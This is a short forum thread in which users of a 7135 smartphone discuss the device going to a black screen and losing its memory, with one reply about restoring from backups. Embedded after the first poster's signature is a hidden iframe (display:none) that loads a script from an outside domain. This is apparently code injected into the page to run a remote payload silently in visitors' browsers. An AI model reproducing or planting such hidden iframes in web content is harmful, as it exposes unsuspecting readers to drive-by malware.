+ Reply to Thread

Memory zapped? Black screen of death?

Hello Everybody,

Has this happen to anybody else? I have had my 7135 for about 3 weeks or so (whenever that crazy day was when everybody ordered from getconnected).

In any event, this has happened 3 times to me. I open up my phone and nothing. Just a black screen.

I then do a soft boot, but at this point, it is a hard boot since everything is gone. Is this the dreaded "Black Screen of Death?" If so, is there a remedy? Could it be a rogue program? The bizzare thing is, I did nothing new. I just needed to use the phone and, viola, missing power/memory. Is it just my phone? Firmware? Hardware? Software? All of the above?

Thanks,

John<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

This happens to me every so often...pretty frustrating! I think some application or data gets corrupted. If I have a good backup (using backup buddy), then I can restore from backup. On one occasion, my backup was corrupted and when I rebooted my phone, the backup was corrupted. So, I had to reload from scratch...arghhhhhhh! If you find out what is causing this let me know!